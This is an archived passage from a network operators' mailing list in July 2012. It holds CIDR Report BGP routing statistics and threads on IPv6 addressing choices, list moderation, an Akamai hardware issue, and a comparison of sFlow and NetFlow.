4766 2733 11119 1236 Korea Telecom (KIX) 17974 2217 558 80 PT TELEKOMUNIKASI INDONESIA 18566 2088 382 181 Covad Communications 28573 2003 1214 55 NET Servicos de Comunicao S.A 10620 1990 346 208 TVCABLE BOGOTA 1785 1935 681 130 PaeTec Communications, Inc. 7545 1690 301 86 TPG Internet Pty Ltd 22773 1665 2911 121 Cox Communications, Inc. Complete listing at http://thyme.rand.apnic.net/current/data-ASnet Global Per AS Maximum Aggr summary ---------------------------------- ASN No of nets Net Savings Description 7029 3337 3160 Windstream Communications Inc 17974 2217 2137 PT TELEKOMUNIKASI INDONESIA 28573 2003 1948 NET Servicos de Comunicao S.A 18566 2088 1907 Covad Communications 1785 1935 1805 PaeTec Communications, Inc. 10620 1990 1782 TVCABLE BOGOTA 7545 1690 1604 TPG Internet Pty Ltd 8402 1589 1573 Corbina telecom 22773 1665 1544 Cox Communications, Inc. 4766 2733 1497 Korea Telecom (KIX) Complete listing at http://thyme.rand.apnic.net/current/data-CIDRnet List of Unregistered Origin ASNs (Global) ----------------------------------------- Bad AS Designation Network Transit AS Description 15132 UNALLOCATED 12.9.150.0/24 7018 AT&T WorldNet Servic 25639 UNALLOCATED 12.41.169.0/24 7018 AT&T WorldNet Servic 13317 UNALLOCATED 12.44.10.0/24 7018 AT&T WorldNet Servic 23502 UNALLOCATED 12.44.44.0/24 7018 AT&T WorldNet Servic 17300 UNALLOCATED 12.45.103.0/24 7018 AT&T WorldNet Servic 17300 UNALLOCATED 12.45.110.0/24 701 UUNET Technologies, 16476 UNALLOCATED 12.46.27.0/24 7018 AT&T WorldNet Servic 14764 UNALLOCATED 12.108.237.0/24 7018 AT&T WorldNet Servic 33649 UNALLOCATED 12.111.112.0/24 19029 New Edge Networks 29760 UNALLOCATED 12.145.34.0/23 7018 AT&T WorldNet Servic Complete listing at http://thyme.rand.apnic.net/current/data-badAS Prefixes from private and non-routed address space (Global) ----------------------------------------------------------- Prefix Origin AS Description 198.18.0.0/15 14744 Internap Network Services Complete listing at http://thyme.rand.apnic.net/current/data-dsua Advertised Unallocated Addresses -------------------------------- Network Origin AS Description 5.144.160.0/20 12637 SEEWEB srl 14.192.0.0/22 45464 Room 201, TGU Bldg 14.192.4.0/22 45464 Room 201, TGU Bldg 14.192.8.0/22 45464 Room 201, TGU Bldg 14.192.12.0/22 45464 Room 201, TGU Bldg 14.192.16.0/22 45464 Room 201, TGU Bldg 14.192.20.0/22 45464 Room 201, TGU Bldg 14.192.24.0/22 45464 Room 201, TGU Bldg 14.192.28.0/22 45464 Room 201, TGU Bldg 27.112.114.0/24 23884 Proimage Engineering and Comm Complete listing at http://thyme.rand.apnic.net/current/data-add-IANA Number of prefixes announced per prefix length (Global) ------------------------------------------------------- /1:0 /2:0 /3:0 /4:0 /5:0 /6:0 /7:0 /8:19 /9:12 /10:28 /11:82 /12:236 /13:471 /14:843 /15:1519 /16:12288 /17:6367 /18:10787 /19:20871 /20:29736 /21:31544 /22:41211 /23:39218 /24:217439 /25:1237 /26:1489 /27:857 /28:168 /29:62 /30:18 /31:0 /32:23 Advertised prefixes smaller than registry allocations ----------------------------------------------------- ASN No of nets Total ann. Description 7029 2673 3337 Windstream Communications Inc 18566 2038 2088 Covad Communications 6389 1868 3389 bellsouth.net, inc. 30036 1323 1388 Mediacom Communications Corp 8402 1285 1589 Corbina telecom 11492 1154 1191 Cable One 22773 1095 1665 Cox Communications, Inc. 6503 1051 1523 AVANTEL, S.A. 1785 1043 1935 PaeTec Communications, Inc. 7011 934 1197 Citizens Utilities Complete listing at http://thyme.rand.apnic.net/current/data-sXXas-nos Number of /24s announced per /8 block (Global) ---------------------------------------------- 1:579 2:691 3:1 4:13 5:128 6:3 8:419 12:2007 13:1 14:636 15:12 16:3 17:5 20:24 23:188 24:1786 27:1329 31:1014 32:56 33:2 34:2 36:8 37:615 38:822 39:1 40:128 41:3016 42:141 44:3 46:1523 47:2 49:430 50:553 52:13 54:14 55:7 56:1 57:34 58:978 59:527 60:245 61:1335 62:923 63:2005 64:4229 65:2238 66:4495 67:2025 68:1140 69:3195 70:980 71:512 72:1868 74:2599 75:479 76:334 77:934 78:905 79:492 80:1215 81:942 82:650 83:523 84:500 85:1160 86:425 87:933 88:357 89:1684 90:303 91:5015 92:582 93:1302 94:1563 95:1242 96:357 97:321 98:887 99:39 100:20 101:256 103:1248 106:115 107:189 108:370 109:1461 110:789 111:939 112:428 113:654 114:655 115:905 116:920 117:722 118:903 119:1220 120:349 121:798 122:1662 123:1164 124:1380 125:1254 128:552 129:185 130:264 131:632 132:300 133:22 134:246 135:61 136:218 137:239 138:334 139:177 140:493 141:246 142:431 143:374 144:474 145:77 146:518 147:281 148:769 149:317 150:151 151:185 152:475 153:176 154:17 155:432 156:220 157:381 158:190 159:625 160:343 161:274 162:379 163:192 164:666 165:410 166:589 167:532 168:914 169:125 170:896 171:146 172:5 173:1726 174:607 175:437 176:563 177:955 178:1619 180:1303 181:104 182:989 183:230 184:539 186:1983 187:1089 188:1367 189:1592 190:6058 192:6008 193:5525 194:4476 195:3229 196:1211 197:170 198:3677 199:4860 200:5959 201:1992 202:8712 203:8667 204:4381 205:2523 206:2786 207:2761 208:4031 209:3626 210:2791 211:1561 212:1970 213:1813 214:867 215:83 216:5088 217:1550 218:556 219:339 220:1228 221:569 222:337 223:350 End of report From Jean-Francois.TremblayING at videotron.com Fri Jul 13 14:35:12 2012 From: Jean-Francois.TremblayING at videotron.com (Jean-Francois.TremblayING at videotron.com) Date: Fri, 13 Jul 2012 15:35:12 -0400 Subject: using "reserved" IPv6 space In-Reply-To: Message-ID: TJ a ?crit sur 13/07/2012 02:47:26 PM : > Of the top of my head, the first problem you might hit there is > WRT multicast ... > (ULA might "win" some source address selections that you want GUA to win) > /TJ Good point, thanks for pointing that out. We'll see when we deploy network-wide IPv6 multicast... not there (yet). /JF From patrick at ianai.net Fri Jul 13 14:49:29 2012 From: patrick at ianai.net (Patrick W. Gilmore) Date: Fri, 13 Jul 2012 15:49:29 -0400 Subject: Communications Committee volunteers [was: The Cidr Report] In-Reply-To: <500066FC.6030707@gmail.com> References: <1342201312.41321.YahooMailNeo@web140806.mail.bf1.yahoo.com> <1342201373.41095.YahooMailNeo@web140806.mail.bf1.yahoo.com> <1342201407.17705.YahooMailNeo@web140802.mail.bf1.yahoo.com> <1342201439.60327.YahooMailNeo@web140806.mail.bf1.yahoo.com> <500066FC.6030707@gmail.com> Message-ID: On Jul 13, 2012, at 14:20 , JC Dill wrote: > On 13/07/12 10:46 AM, Grant Ridder wrote: >> if the admins are not going to moderate this list... give me the admin >> password to the list serve and i will set it up right... gees > > +1 Most excellent! Just so you know, "the admins" are the Communications Committee, and they are always looking for new volunteers. I assume you both will be volunteering forthwith? -- TTFN, patrick From jared at puck.nether.net Fri Jul 13 14:51:14 2012 From: jared at puck.nether.net (Jared Mauch) Date: Fri, 13 Jul 2012 15:51:14 -0400 Subject: Communications Committee volunteers [was: The Cidr Report] In-Reply-To: References: <1342201312.41321.YahooMailNeo@web140806.mail.bf1.yahoo.com> <1342201373.41095.YahooMailNeo@web140806.mail.bf1.yahoo.com> <1342201407.17705.YahooMailNeo@web140802.mail.bf1.yahoo.com> <1342201439.60327.YahooMailNeo@web140806.mail.bf1.yahoo.com> <500066FC.6030707@gmail.com> Message-ID: <9C1A5586-E64C-4B3A-8978-10CDC479E275@puck.nether.net> On Jul 13, 2012, at 3:49 PM, Patrick W. Gilmore wrote: > On Jul 13, 2012, at 14:20 , JC Dill wrote: >> On 13/07/12 10:46 AM, Grant Ridder wrote: > >>> if the admins are not going to moderate this list... give me the admin >>> password to the list serve and i will set it up right... gees >> >> +1 > > Most excellent! > > Just so you know, "the admins" are the Communications Committee, and they are always looking for new volunteers. > > I assume you both will be volunteering forthwith? They already did in public. I don't think they can turn it down now :) - Jared From shortdudey123 at gmail.com Fri Jul 13 15:02:29 2012 From: shortdudey123 at gmail.com (Grant Ridder) Date: Fri, 13 Jul 2012 15:02:29 -0500 Subject: Communications Committee volunteers [was: The Cidr Report] In-Reply-To: <9C1A5586-E64C-4B3A-8978-10CDC479E275@puck.nether.net> References: <1342201312.41321.YahooMailNeo@web140806.mail.bf1.yahoo.com> <1342201373.41095.YahooMailNeo@web140806.mail.bf1.yahoo.com> <1342201407.17705.YahooMailNeo@web140802.mail.bf1.yahoo.com> <1342201439.60327.YahooMailNeo@web140806.mail.bf1.yahoo.com> <500066FC.6030707@gmail.com> <9C1A5586-E64C-4B3A-8978-10CDC479E275@puck.nether.net> Message-ID: The admins say they are working on a content filter system. All you really should have to do if do keyword filtering in mailman. I have this setup on a maillist that i manage. On Fri, Jul 13, 2012 at 2:51 PM, Jared Mauch wrote: > > On Jul 13, 2012, at 3:49 PM, Patrick W. Gilmore wrote: > > > On Jul 13, 2012, at 14:20 , JC Dill wrote: > >> On 13/07/12 10:46 AM, Grant Ridder wrote: > > > >>> if the admins are not going to moderate this list... give me the admin > >>> password to the list serve and i will set it up right... gees > >> > >> +1 > > > > Most excellent! > > > > Just so you know, "the admins" are the Communications Committee, and > they are always looking for new volunteers. > > > > I assume you both will be volunteering forthwith? > > They already did in public. I don't think they can turn it down now :) > > - Jared > > > From robertg at garlic.com Fri Jul 13 15:03:54 2012 From: robertg at garlic.com (Robert Glover) Date: Fri, 13 Jul 2012 13:03:54 -0700 Subject: Akamai infrastructure tech In-Reply-To: <500069AD.7040705@garlic.com> References: <500069AD.7040705@garlic.com> Message-ID: <50007F2A.205@garlic.com> Thanks to everyone who responded; we've got this completely taken care of! On 07/13/2012 11:32 AM, Robert Glover wrote: > If someone with Akamai is watching, can you please have someone from > infrastructure contact me? We host an Akamai server, a drive started > taking errors, Akamai shipped us a new drive, but did not tell us which > of the eight drives in the server needs to be replaced. > > Normal contact channels have resulted in voicemail or no clue :( > > Thanks, > -Robert > From sean at seanharlow.info Fri Jul 13 15:13:33 2012 From: sean at seanharlow.info (Sean Harlow) Date: Fri, 13 Jul 2012 16:13:33 -0400 Subject: Communications Committee volunteers [was: The Cidr Report] In-Reply-To: References: <1342201312.41321.YahooMailNeo@web140806.mail.bf1.yahoo.com> <1342201373.41095.YahooMailNeo@web140806.mail.bf1.yahoo.com> <1342201407.17705.YahooMailNeo@web140802.mail.bf1.yahoo.com> <1342201439.60327.YahooMailNeo@web140806.mail.bf1.yahoo.com> <500066FC.6030707@gmail.com> <9C1A5586-E64C-4B3A-8978-10CDC479E275@puck.nether.net> Message-ID: On Jul 13, 2012, at 16:02, Grant Ridder wrote: > The admins say they are working on a content filter system. All you really > should have to do if do keyword filtering in mailman. I have this setup on > a maillist that i manage. How well would that actually work against what seems to be a bored individual with nothing better to do but send this stuff here? Any keyword filters can be easily circumvented in the same way spammers have done for years. We'll just be seeing these stories with lots of "pen1s" or similar quick edits. From peter.phaal at gmail.com Fri Jul 13 15:20:45 2012 From: peter.phaal at gmail.com (Peter Phaal) Date: Fri, 13 Jul 2012 13:20:45 -0700 Subject: Real world sflow vs netflow? In-Reply-To: References: Message-ID: Hi David, The main architectural difference between sFlow and Netflow is the location of the flow cache: 1. NetFlow: Packets are decoded on the router, flow keys are extracted and used to lookup/create an entry in a flow cache which is then updated based on values in the packet. Records are exported from the flow cache in the form of Netflow datagrams when the flow completes or based on a timeout. 2. sFlow: Packets are randomly sampled in hardware and the packet headers are immediately exported as sFlow datagrams - there is no flow cache on the switch/router. In addition to exporting the packet header, the sFlow agent captures the FIB state associated with forwarding the sampled packet, exporting information such as next hop router, AS-path, communities etc. An sFlow agent also periodically sends all the MIB-II interface counters, eliminating the need for SNMP polling - this isn't very important if you are only monitoring a few links, but makes a big difference if you are monitoring large chassis switches or tens or hundreds of thousands of ports in a data center or campus environment. Moving the flow cache off the router has a number of benefits: 1. You are no longer limited by the hardware/firmware capabilities of the router - your analysis software decides which fields to decode and how to accumulate results. For example, if you are managing a mixed IPv4/IPv6 environment you can decide to use sFlow to look into v6 over v4 and v4 over v6 tunnels (to do the same thing with Netflow would likely require a hardware upgrade). You can even feed sFlow into Wireshark for detailed analysis of protocols and packet headers. 2. Operational complexity is greatly reduced since the configuration options and resource management issues associated with the flow cache are eliminated. 3. Low latency. Measurements aren't delayed by the flow cache - you can detect DDoS attacks/large flows within seconds. 4. Scalability - you can turn on sFlow on every link (even 100G links), on every device for a comprehensive view of traffic. 5. Multi-vendor interoperability. The sFlow measurements are interoperable across vendors (since very little processing is performed on the devices). With NetFlow, different vendors and devices have different hardware limitations affecting the fields that they can export. Unsampled Netflow is only practical for moderate traffic levels. If you carry significant traffic you would want to enable sampling anyway, even with Netflow. However, there are a wide range of Netflow sampling implementations, many of which yield questionable results. In contrast, the sFlow standard specifies how sampling must be performed and ensures that information is included that allows the sampled data to be correctly scaled and produce unbiased measurements. Cheers, Peter On Fri, Jul 13, 2012 at 10:30 AM, David Hubbard wrote: > Can anyone on or off list give me some real world > thoughts on sflow vs netflow for border > routers? (multi-homed, BGP, straight v4 & v6 only > for web hosting, no mpls, vpns, vlans, etc.) > > Finding it hard to decipher the vendor version > of the answer to that question. We use > netflow v9 currently but are considering hardware > that would be sflow. We don't use it for > billing purposes, mostly for spotting malicious > remote hosts doing things like scans, spotting > traffic such as weird ports in use in either > direction that warrant further investigation, > watching for ddos/dos destinations to act on > mitigation, or investigating the nature of unusual > levels of traffic on switch ports that set off > alarms. I'm concerned things like port scans, > etc. won't be picked up by the NMS if fed by > sflow due to the sampling nature, or similar > concern if 500 ssh connections by the same remote > host are sampled as 1 connection, etc. Of course > these concerns were put in my head by someone > interested in me continuing to use equipment that > happens to output netflow data, hence me wanting some > real people answers. :-) > > Thanks! > > From randy at psg.com Fri Jul 13 18:24:31 2012 From: randy at psg.com (Randy Bush) Date: Sat, 14 Jul 2012 08:24:31 +0900 Subject: using "reserved" IPv6 space In-Reply-To: <500042B5.4030502@gmail.com> References: <500032E4.40804@gmail.com> <500042B5.4030502@gmail.com> Message-ID: keep life simple. use global ipv6 space. randy From owen at delong.com Fri Jul 13 19:30:08 2012 From: owen at delong.com (Owen DeLong) Date: Fri, 13 Jul 2012 17:30:08 -0700 Subject: using "reserved" IPv6 space In-Reply-To: References: <500032E4.40804@gmail.com> <500042B5.4030502@gmail.com> Message-ID: <42FE7891-32BC-4C67-B814-D37D74EE0581@delong.com> On Jul 13, 2012, at 4:24 PM, Randy Bush wrote: > keep life simple. use global ipv6 space. > > randy Though it is rare, this is one time when I absolutely agree with Randy. Owen From jloiacon at csc.com Fri Jul 13 20:30:37 2012 From: jloiacon at csc.com (Joe Loiacono) Date: Fri, 13 Jul 2012 21:30:37 -0400 Subject: Real world sflow vs netflow? In-Reply-To: References: Message-ID: Peter Phaal wrote on 07/13/2012 04:20:45 PM: > 2. sFlow: Packets are randomly sampled in hardware and the packet > headers are immediately exported as sFlow datagrams - there is no flow > cache on the switch/router. In addition to exporting the packet > header, the sFlow agent captures the FIB state associated with > forwarding the sampled packet, exporting information such as next hop > router, AS-path, communities etc What about byte counts? Just those in the sampled packet (i.e., no running totals per flow)? > In contrast, the sFlow standard specifies how sampling must be performed > and ensures that information is included that allows the sampled data > to be correctly scaled and produce unbiased measurements. Does sflow software typically recreate the total byte count per flow (e.g., TCP session) by scaling? Thanks, Joe From bross at pobox.com Fri Jul 13 20:41:23 2012 From: bross at pobox.com (Brandon Ross) Date: Fri, 13 Jul 2012 21:41:23 -0400 (EDT) Subject: using "reserved" IPv6 space In-Reply-To: <42FE7891-32BC-4C67-B814-D37D74EE0581@delong.com> References: <500032E4.40804@gmail.com> <500042B5.4030502@gmail.com> <42FE7891-32BC-4C67-B814-D37D74EE0581@delong.com> Message-ID: On Fri, 13 Jul 2012, Owen DeLong wrote: > On Jul 13, 2012, at 4:24 PM, Randy Bush wrote: > >> keep life simple. use global ipv6 space. >> >> randy > > Though it is rare, this is one time when I absolutely agree with Randy. It's even more rare for me to agree with Randy AND Owen at the same time. -- Brandon Ross Yahoo & AIM: BrandonNRoss +1-404-635-6667 ICQ: 2269442 Schedule a meeting: https://tungle.me/bross Skype: brandonross From cidr-report at potaroo.net Fri Jul 13 17:00:00 2012 From: cidr-report at potaroo.net (cidr-report at potaroo.net) Date: Fri, 13 Jul 2012 22:00:00 GMT Subject: The Cidr Report Message-ID: <201207132200.q6DM00xM047173@wattle.apnic.net> This report has been generated at Fri Jul 13 21:10:00 2012 AEST. The report analyses the BGP Routing Table of AS2.0 router and generates a report on aggregation potential within the table. Check http://www.cidr-report.org for a current version of this report. Recent Table History Date Prefixes CIDR Agg 06-07-12 418603 242444 07-07-12 418670 242326 08-07-12 418651 242260 09-07-12 417976 242235 10-07-12 418251 242235 11-07-12 0 242235 12-07-12 0 242235 13-07-12 0 242235 AS Summary 0 Number of ASes in routing system 0 Number of ASes announcing only one prefix 3390 Largest number of prefixes announced by an AS AS6389 : BELLSOUTH-NET-BLK - BellSouth.net Inc. 0 Largest address span announced by an AS (/32s) ????? : BELLSOUTH-NET-BLK - BellSouth.net Inc. Aggregation Summary The algorithm used in this report proposes aggregation only when there is a precise match using the AS path, so as to preserve traffic transit policies. Aggregation is also proposed across non-advertised address space ('holes'). --- 13Jul12 --- ASnum NetsNow NetsAggr NetGain % Gain Description Table 418251 242235 176016 42.1% All ASes AS6389 3390 190 3200 94.4% BELLSOUTH-NET-BLK - BellSouth.net Inc. AS7029 3281 1636 1645 50.1% WINDSTREAM - Windstream Communications Inc AS17974 2146 606 1540 71.8% TELKOMNET-AS2-AP PT Telekomunikasi Indonesia AS22773 1655 136 1519 91.8% ASN-CXA-ALL-CCI-22773-RDC - Cox Communications Inc. AS4766 2710 1251 1459 53.8% KIXS-AS-KR Korea Telecom AS18566 2088 706 1382 66.2% COVAD - Covad Communications Co. AS28573 1986 622 1364 68.7% NET Servicos de Comunicao S.A. AS2118 1288 15 1273 98.8% RELCOM-AS OOO "NPO Relcom" AS4323 1576 386 1190 75.5% TWTC - tw telecom holdings, inc. AS1785 1934 814 1120 57.9% AS-PAETEC-NET - PaeTec Communications, Inc. AS10620 1983 897 1086 54.8% Telmex Colombia S.A. AS4755 1612 561 1051 65.2% TATACOMM-AS TATA Communications formerly VSNL is Leading ISP AS7303 1452 457 995 68.5% Telecom Argentina S.A. AS7552 1124 234 890 79.2% VIETEL-AS-AP Vietel Corporation AS8151 1491 687 804 53.9% Uninet S.A. de C.V. AS18101 946 161 785 83.0% RELIANCE-COMMUNICATIONS-IN Reliance Communications Ltd.DAKC MUMBAI AS17908 827 60 767 92.7% TCISL Tata Communications AS4808 1106 352 754 68.2% CHINA169-BJ CNCGROUP IP network China169 Beijing Province Network AS9394 888 162 726 81.8% CRNET CHINA RAILWAY Internet(CRNET) AS13977 839 123 716 85.3% CTELCO - FAIRPOINT COMMUNICATIONS, INC. AS8452 1166 518 648 55.6% TE-AS TE-AS AS3356 1106 465 641 58.0% LEVEL3 Level 3 Communications AS855 695 58 637 91.7% CANET-ASN-4 - Bell Aliant Regional Communications, Inc. AS17676 692 75 617 89.2% GIGAINFRA Softbank BB Corp. AS4780 841 245 596 70.9% SEEDNET Digital United Inc. AS22561 1023 428 595 58.2% DIGITAL-TELEPORT - Digital Teleport Inc. AS19262 998 405 593 59.4% VZGNI-TRANSIT - Verizon Online LLC AS24560 1036 448 588 56.8% AIRTELBROADBAND-AS-AP Bharti Airtel Ltd., Telemedia Services AS3549 993 436 557 56.1% GBLX Global Crossing Ltd. AS4804 649 97 552 85.1% MPX-AS Microplex PTY LTD Total 43521 13231 30290 69.6% Top 30 total Possible Bogus Routes 10.86.64.32/30 AS65530 -Private Use AS- 10.86.64.36/30 AS65530 -Private Use AS- 10.86.65.32/30 AS65530 -Private Use AS- 10.86.65.36/30 AS65530 -Private Use AS- 10.255.255.0/30 AS65530 -Private Use AS- 10.255.255.4/30 AS65530 -Private Use AS- 10.255.255.8/30 AS65530 -Private Use AS- 14.192.0.0/22 AS45464 NEXTWEB-AS-AP Room 201, TGU Bldg 14.192.4.0/22 AS45464 NEXTWEB-AS-AP Room 201, TGU Bldg 14.192.8.0/22 AS45464 NEXTWEB-AS-AP Room 201, TGU Bldg 14.192.12.0/22 AS45464 NEXTWEB-AS-AP Room 201, TGU Bldg 14.192.16.0/22 AS45464 NEXTWEB-AS-AP Room 201, TGU Bldg 14.192.20.0/22 AS45464 NEXTWEB-AS-AP Room 201, TGU Bldg 14.192.24.0/22 AS45464 NEXTWEB-AS-AP Room 201, TGU Bldg 14.192.28.0/22 AS45464 NEXTWEB-AS-AP Room 201, TGU Bldg 27.112.114.0/24 AS23884 PROENNET-AS Proimage Engineering and Communication Co.,Ltd. 62.61.220.0/24 AS24974 TACHYON-EU Tachyon Europe BV 62.61.221.0/24 AS24974 TACHYON-EU Tachyon Europe BV 64.66.32.0/20 AS18864 66.171.32.0/20 AS705 UUNET - MCI Communications Services, Inc. d/b/a Verizon Business 66.180.239.0/24 AS35888 VIGNETTE - VIGNETTE CORPORATION 66.207.32.0/20 AS23011 66.245.176.0/20 AS19318 NJIIX-AS-1 - NEW JERSEY INTERNATIONAL INTERNET EXCHANGE LLC 66.251.128.0/24 AS33227 BLUEBRIDGE-NETWORKS - Blue Bridge Networks 66.251.133.0/24 AS33227 BLUEBRIDGE-NETWORKS - Blue Bridge Networks 66.251.134.0/24 AS33227 BLUEBRIDGE-NETWORKS - Blue Bridge Networks 66.251.136.0/21 AS33227 BLUEBRIDGE-NETWORKS - Blue Bridge Networks 66.251.140.0/24 AS33227 BLUEBRIDGE-NETWORKS - Blue Bridge Networks 66.251.141.0/24 AS33227 BLUEBRIDGE-NETWORKS - Blue Bridge Networks 66.251.142.0/24 AS33227 BLUEBRIDGE-NETWORKS - Blue Bridge Networks 66.251.143.0/24 AS3356 LEVEL3 Level 3 Communications 69.46.224.0/20 AS32592 HUNT-BROTHERS-OF-LOUISIANA-LLC - Hunt Brothers 69.46.233.0/24 AS32592 HUNT-BROTHERS-OF-LOUISIANA-LLC - Hunt Brothers 69.46.236.0/24 AS32592 HUNT-BROTHERS-OF-LOUISIANA-LLC - Hunt Brothers 70.34.112.0/20 AS27589 MOJOHOST - MOJOHOST 71.19.134.0/23 AS3313 INET-AS BT Italia S.p.A. 72.35.224.0/22 AS30097 NUWAVE - NuWave 72.35.229.0/24 AS30188 TELEVERGENCE - Televergence Solutions Inc. 72.35.232.0/21 AS30097 NUWAVE - NuWave 72.44.16.0/20 AS15054 HAMELTRONICS - Hameltronics, LLC 74.91.48.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC 74.91.49.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC 74.91.50.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC 74.91.51.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC 74.91.52.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC 74.91.53.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC 74.91.54.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC 74.91.55.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC 74.91.56.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC 74.91.57.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC 74.91.58.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC 74.91.59.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC 74.91.60.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC 74.91.61.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC 74.91.62.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC 74.91.63.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC 74.115.124.0/23 AS46540 74.115.126.0/24 AS11260 EASTLINK-HSI - EastLink 81.22.64.0/20 AS5511 OPENTRANSIT France Telecom S.A. 82.101.160.0/19 AS5511 OPENTRANSIT France Telecom S.A. 110.34.44.0/22 AS12653 COMTONET KB Impuls Hellas S.A. 116.206.72.0/24 AS6461 MFNX MFN - Metromedia Fiber Network 116.206.85.0/24 AS6461 MFNX MFN - Metromedia Fiber Network 116.206.103.0/24 AS6461 MFNX MFN - Metromedia Fiber Network 117.120.56.0/21 AS4755 TATACOMM-AS TATA Communications formerly VSNL is Leading ISP 120.136.17.0/24 AS38779 BMG-AS-ID Badan Meteorologi dan Geofisika 121.46.0.0/16 AS4134 CHINANET-BACKBONE No.31,Jin-rong Street 142.54.0.0/19 AS23498 CDSI - Cogeco Data Services LP 172.14.0.0/24 AS57871 ASTELECENTR TeleCentr Ltd. 172.15.0.0/24 AS57871 ASTELECENTR TeleCentr Ltd. 172.45.1.0/24 AS3356 LEVEL3 Level 3 Communications 172.102.0.0/22 AS4812 CHINANET-SH-AP China Telecom (Group) 172.116.0.0/24 AS7018 ATT-INTERNET4 - AT&T Services, Inc. 198.18.0.0/15 AS14744 INTERNAP-BLOCK-4 - Internap Network Services Corporation 198.51.100.0/24 AS14744 INTERNAP-BLOCK-4 - Internap Network Services Corporation 200.1.112.0/24 AS29754 GO2TEL GO2TEL.COM INC. 200.6.49.0/24 AS23148 TERREMARK Terremark 200.24.73.0/24 AS26061 Equant Colombia 200.33.40.0/24 AS11172 Alestra, S. de R.L. de C.V. 200.34.0.0/20 AS6342 Instituto Tecnol?gico y de Estudios Superiores de Monterrey 200.53.0.0/19 AS13878 Diveo do Brasil Telecomunicacoes Ltda 200.58.248.0/21 AS27849 200.75.184.0/21 AS14754 Telgua 200.106.128.0/20 AS3257 TINET-BACKBONE Tinet SpA 200.115.112.0/20 AS3257 TINET-BACKBONE Tinet SpA 202.1.224.0/24 AS10097 FLOWCOM Flow Communications 2/541 Kent St Sydney NSW 2000 202.8.106.0/24 AS9530 SHINSEGAE-AS SHINSEGAE I&C Co., Ltd. 202.58.113.0/24 AS19161 202.83.120.0/21 AS37972 202.83.124.0/24 AS37972 202.83.125.0/24 AS37972 202.83.126.0/24 AS37972 202.94.1.0/24 AS4808 CHINA169-BJ CNCGROUP IP network China169 Beijing Province Network 202.140.128.0/19 AS9583 SIFY-AS-IN Sify Limited 202.174.125.0/24 AS9498 BBIL-AP BHARTI Airtel Ltd. 202.176.1.0/24 AS9942 COMINDICO-AP SOUL Converged Communications Australia 202.179.134.0/24 AS23966 LDN-AS-PK LINKdotNET Telecom Limited 203.0.113.0/24 AS14744 INTERNAP-BLOCK-4 - Internap Network Services Corporation 203.23.1.0/24 AS18111 NETSPEED-AS-AP Netspeed Internet Communications 203.24.38.0/24 AS18111 NETSPEED-AS-AP Netspeed Internet Communications 203.30.127.0/24 AS18111 NETSPEED-AS-AP Netspeed Internet Communications 203.32.86.0/23 AS18111 NETSPEED-AS-AP Netspeed Internet Communications 203.32.86.0/24 AS18111 NETSPEED-AS-AP Netspeed Internet Communications 203.32.87.0/24 AS18111 NETSPEED-AS-AP Netspeed Internet Communications 203.32.188.0/24 AS1221 ASN-TELSTRA Telstra Pty Ltd 203.142.219.0/24 AS45149 204.9.116.0/22 AS30097 NUWAVE - NuWave 204.10.88.0/21 AS3356 LEVEL3 Level 3 Communications 204.10.92.0/23 AS30097 NUWAVE - NuWave 204.10.94.0/23 AS30097 NUWAVE - NuWave 204.14.0.0/21 AS30693 EONIX-CORPORATION-AS-PHX01-WWW-INFINITIE-NET - Eonix Corporation 204.14.0.0/24 AS30693 EONIX-CORPORATION-AS-PHX01-WWW-INFINITIE-NET - Eonix Corporation 204.14.2.0/24 AS30693 EONIX-CORPORATION-AS-PHX01-WWW-INFINITIE-NET - Eonix Corporation 204.14.3.0/24 AS30693 EONIX-CORPORATION-AS-PHX01-WWW-INFINITIE-NET - Eonix Corporation 205.175.214.0/24 AS5583 ORANGE-BUSINESS-SERVICES-BENELUX France Telecom S.A. 206.197.184.0/24 AS23304 DATOTEL-STL-AS - Datotel LLC, a NetLabs LLC Company 207.174.131.0/24 AS26116 INDRA - Indra's Net Inc 207.174.132.0/23 AS26116 INDRA - Indra's Net Inc 207.174.152.0/23 AS26116 INDRA - Indra's Net Inc 207.174.154.0/24 AS26116 INDRA - Indra's Net Inc 207.174.155.0/24 AS26116 INDRA - Indra's Net Inc 207.174.200.0/24 AS22658 EARTHNET - Earthnet, Inc. 207.174.248.0/21 AS6653 PRIVATEI - privateI, LLC 207.231.96.0/19 AS11194 NUNETPA - NuNet Inc. 208.83.53.0/24 AS40569 YGOMI-AS - Ygomi LLC 208.93.144.0/21 AS30693 EONIX-CORPORATION-AS-PHX01-WWW-INFINITIE-NET - Eonix Corporation 208.93.151.0/24 AS30693 EONIX-CORPORATION-AS-PHX01-WWW-INFINITIE-NET - Eonix Corporation 209.148.64.0/19 AS13773 TELNETCOMM - Telnet Communications 209.177.64.0/20 AS6461 MFNX MFN - Metromedia Fiber Network 209.213.0.0/20 AS33005 ELTOPIA - Eltopia.com, LLC 213.150.202.0/24 AS8513 SKYVISION SkyVision Global Networks Ltd 213.150.204.0/24 AS29338 AFOL-AS Used by Africaonline Operations 216.12.160.0/20 AS26627 AS-PILOSOFT - Pilosoft, Inc. 216.21.160.0/20 AS27876 American Data Networks 216.155.176.0/20 AS16706 216.194.160.0/20 AS27876 American Data Networks Please see http://www.cidr-report.org for the full report ------------------------------------ Copies of this report are mailed to: nanog at nanog.org eof-list at ripe.net apops at apops.net routing-wg at ripe.net afnog at afnog.org From patrick at ianai.net Sat Jul 14 00:52:39 2012 From: patrick at ianai.net (Patrick W. Gilmore) Date: Sat, 14 Jul 2012 01:52:39 -0400 Subject: The Cidr Report In-Reply-To: <201207132200.q6DM00xM047173@wattle.apnic.net> References: <201207132200.q6DM00xM047173@wattle.apnic.net> Message-ID: Composed on a virtual keyboard, please forgive typos. On Jul 13, 2012, at 22:00, cidr-report at potaroo.net wrote: > This report has been generated at Fri Jul 13 